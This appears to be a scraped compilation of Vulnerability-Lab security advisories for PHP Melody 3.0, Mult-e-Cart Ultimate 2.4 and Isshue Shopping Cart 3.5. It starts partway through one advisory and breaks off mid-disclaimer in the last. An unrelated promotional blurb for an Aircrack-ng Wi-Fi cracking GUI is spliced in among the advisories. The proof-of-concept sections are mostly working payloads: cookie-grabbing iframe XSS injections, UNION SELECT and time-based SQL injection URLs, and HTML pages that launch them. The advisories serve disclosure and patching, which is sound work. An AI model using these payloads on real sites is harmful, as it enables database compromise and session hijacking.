height="200">&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4 </iframe> </body></head> </html> --- PoC Session Logs (GET) (move) --- https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)> Host: phpmelody.localhost.com:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u; melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88; cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy; pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin - GET: HTTP/2.0 200 OK content-type: text/html; charset=utf-8 x-powered-by: PHP/5.4.34 --- PoC Session Logs (GET) (username) --- https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 Host: phpmelody.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u; melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88; cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy; pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin - GET: HTTP/2.0 200 OK content-type: text/html; charset=utf-8 x-powered-by: PHP/5.4.34 Vulnerable Source: Categories.php (type=genre&id=1&moved) <div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">×</span></button> Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div> <div id="display_result" style="display:none;"></div> Vulnerable Source: Import Videos from User (action=search&username) <div class="card"> <div class="card-body"> <h5 class="mb-3">Username</h5> <div class="d-block"> <form name="import-user-search-form" id="import-user-search-form" action="" method="post" class=""> <div class="input-group mb-3"> <div class="form-group-feedback form-group-feedback-left"> <input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">" placeholder="Enter username or Channel ID" autocomplete="yt-username" /> <div class="form-control-feedback form-control-feedback-lg"> <i class="icon-search4 text-muted"></i> </div></div> <div class="input-group-append"> <select name="data_source" class="form-field alpha-grey custom-select custom-select-lg"> <option value="youtube" selected="selected">Youtube User</option> <option value="youtube-channel" >Youtube Channel</option> <option value="dailymotion" >Dailymotion User</option> <option value="vimeo" >Vimeo User</option> </select></div> <div class="input-group-append"> <button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button> </div></div> Reference(s): https://phpmelody.localhost.com:8080/admin/ https://phpmelody.localhost.com:8080/admin/import.php https://phpmelody.localhost.com:8080/admin/categories.php https://phpmelody.localhost.com:8080/admin/import-user.php Solution - Fix & Patch: ======================= The vulnerabilities can be resolved by the following steps ... 1. Encode, escape or filter the vulnerable move, keyword and username parameters in the get method requests 2. Restrict all the transmitted parameters by disallowing the usage of special chars 3. Sanitize the status message and error message output to prevent the execution points 4. Alternativ setup security headers and a web firewall or filter to prevent further exploitation Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection # Date: 2021-10-20 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.phpsugar.com/phpmelody.html # Version: v3 Document Title: =============== PHP Melody v3.0 - (vid) SQL Injection Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2295 Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/ Release Date: ============= 2021-10-20 Vulnerability Laboratory ID (VL-ID): ==================================== 2295 Common Vulnerability Scoring System: ==================================== 7 Vulnerability Class: ==================== SQL Injection Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS. (Copy of the Homepage: https://www.phpsugar.com/phpmelody.html ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application. Affected Product(s): ==================== PHPSUGAR Product: PHP Melody v3.0 - Video CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-01: Researcher Notification & Coordination (Security Researcher) 2021-09-02: Vendor Notification (Security Department) 2021-09-04: Vendor Response/Feedback (Security Department) 2021-09-22: Vendor Fix/Patch (Service Developer Team) 2021-09-22: Security Acknowledgements (Security Department) 2021-10-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Full Authentication (Admin/Root Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A remote sql-injection vulnerability has been discovered in the PHP Melody v3.0 video cms web-application. The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or file system of the web-application. The remote sql injection vulnerability is located in the `vid` parameter of the `edit-video.php` file. Remote attackers with moderator or admin access privileges are able to execute own malicious sql commands by inject get method request. The vid parameter in the acp ui is not sanitized properly. Thus allows an attacker to inject own sql commands to compromise the web-application and dbms. Exploitation of the remote sql injection vulnerability requires no user interaction but a privileged moderator or admin account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] Video Edit Vulnerable File(s): [+] edit-video.php Vulnerable Parameter(s): [+] vid Proof of Concept (PoC): ======================= The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Original: https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc PoC: Exploitation #1 https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271), NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PoC: Exploitation #2 https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))-- PoC: Exploit <html> <head><body> <title>phpmelody vid sql injection poc</title> <iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271), NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"> <br> <iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--"> </body></head> </html> Reference(s): https://phpmelody.localhost:8000/ https://phpmelody.localhost:8000/admin/ https://phpmelody.localhost:8000/admin/edit-video.php Solution - Fix & Patch: ======================= The vulnerability can be resolved by the following steps ... 1. Use a prepared statement to build the query 2. Restrict the parameter input to disallow special chars 3. Escape and encode the content to prevent execution of malicious payloads 4. Alternativ it is possible to integrate a web firewall or filter class to block further attacks. Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection # Date: 2021-10-22 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://multecart.com/ # Version: 2.4 Document Title: =============== Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2306 Release Date: ============= 2021-10-22 Vulnerability Laboratory ID (VL-ID): ==================================== 2306 Common Vulnerability Scoring System: ==================================== 7 Vulnerability Class: ==================== SQL Injection Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Digital Multivendor Marketplace Online Store - eShop CMS (Source: https://ultimate.multecart.com/ & https://www.techraft.in/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application. Affected Product(s): ==================== Techraft Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-10-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple classic sql-injection web vulnerabilities has been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application. The web vulnerability allows remote attackers to inject or execute own sql commands to compromise the database management system. The vulnerabilities are located in the `id` parameter of the `view` and `update` function. The vulnerable modules are `inventory`, `customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable id parameter to execute malicious sql commands. The request method to inject is get and the attack vector is located on the client-side. The remote vulnerability is a classic order by sql-injection. The issue is exploitable with one of the two vendor roles or higher privileged roles like admin. Exploitation of the remote sql injection vulnerabilities requires no user interaction and a privileged vendor- or admin role user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] inventory/inventory/update [+] /customer/customer/view [+] /vendor/vendor/view [+] /order/sub-order/view-order Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access without user interaction. For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue. PoC: Payloads 1' union select 1,2,3,4,@@version--&edit=t 1' union select 1,2,3,4,@@database--&edit=t PoC: Exploitation https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5 - https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5 PoC: Exploit <html> <head><body> <title>Mult-E-Cart Ultimate - SQL Injection PoC</title> <iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br> <iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br> <iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br> <iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"><br> <br> <iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br> <iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br> <iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br> <iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400"> </body></head> </html> --- SQL Error Exception Handling Logs --- SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause' The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100-- - PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299 - Stack trace: #0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute() #1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...') #2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL) #3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne() #4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL) #5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one() #6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'') #7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'') #8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array) #9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array) #10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array) #11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array) #12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest)) #13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run() #14 {main} - Next yiidbException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678 - Stack trace: #0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yiidbSchema->convertException(Object(PDOException), 'SELECT * FROM `...') #1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...') #2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL) #3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne() #4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL) #5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one() #6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'') #7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'') #8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array) #9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array) #10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array) #11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array) #12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest)) #13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run() #14 {main} Debug Array: [0] => 42000 [1] => 1064 [2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 - Reference(s): https://multecartultimate.localhost:8080/vendor/vendor/view https://multecartultimate.localhost:8080/customer/customer/view https://multecartultimate.localhost:8080/inventory/inventory/update https://multecartultimate.localhost:8080/order/sub-order/view-order Solution - Fix & Patch: ======================= The vulnerability can be resolved by the following description ... 1. Disable to display the sql errors for other users then the admin or pipe it into a local log file outside the panel ui 2. Use a prepared statement to protect the query against further injection attacks 3. Restrict the vulnerable id parameter to disallow usage of special chars of post and get method requests 4. Encode and escape the id content on get method request with the id parameter Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

Dear, are you still having trouble with the numerous Aircrack-ng's orders? He is here.he is here. The Aircrack-ng graphical operation program is here! Make your operation more slight and make your kidneys more overdrawn. Installation cd Aircrack-ng gui #Enter directory pip install -r requirements.txt #Installation dependencies (required dependencies in kali have been basically installed) python3 aircrack-gui.py User Guide Startup interface Scan the network Capture handshake file Configure dictionary and handshake bag Cracking effect Summary Simply put, it is to visualize the Aircrack-ng command, which is more convenient for novices to use. Of course, if you want to have a higher level of operation, then try the command line. Attachment Download Aircrack-ng Decompression password Follow the WeChat official account (kali Hacker Notes) and the backend reply to kali666 will be automatically obtained.

# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS) # Date: 2021-10-22 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ # Version: 3.5 Document Title: =============== Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2284 Release Date: ============= 2021-10-22 Vulnerability Laboratory ID (VL-ID): ==================================== 2284 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is all in one package for website management with backend admin panel to manage inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it through one-time payment now. Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce solutions. Isshue is the best choice for any type of e-commerce business, big or small. (Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application. Affected Product(s): ==================== bdtask Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-23: Researcher Notification & Coordination (Security Researcher) 2021-08-24: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-10-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= Medium User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. A input validation web vulnerability has been discovered in the title input fields in `new invoice`, `customer` & `stock` modules. The `title` input and parameter allows to inject own malicious script code with persistent attack vector. The content of the input and parameter is insecure validated, thus allows remote attackers with privileged user accounts (manager/keeper/admin) to inject own malformed script code that executes on preview. The request method to inject is post and the attack vector is persistent on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Edit Title Vulnerable Input(s): [+] Title Vulnerable Parameter(s): [+] title Affected Module(s): [+] stock [+] customer [+] invoice Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with keeper account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: <div class="row"> <div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M"> <div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0"> <div class="panel-heading ui-sortable-handle"> <div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div> <div class="dropdown"><ul class="dropdown-menu dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title" data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i> <span class="control-title">Edit title</span></a></li><li> <a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li> <a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li><li> <a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li><li><a data-func="expand" data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li><li> <a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul> <div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div> <form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate"> <div class="panel-body"> <div class="row"> <div class="col-sm-8" id="payment_from_1"> <div class="form-group row"> <label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label> <div class="col-sm-6"> <input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off"> <input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id"> </div> --- PoC Session Logs (GET) [Execute] --- https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source Host: isshue.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de- 1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA== - GET: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de- 1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/ Security Risk: ============== The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims 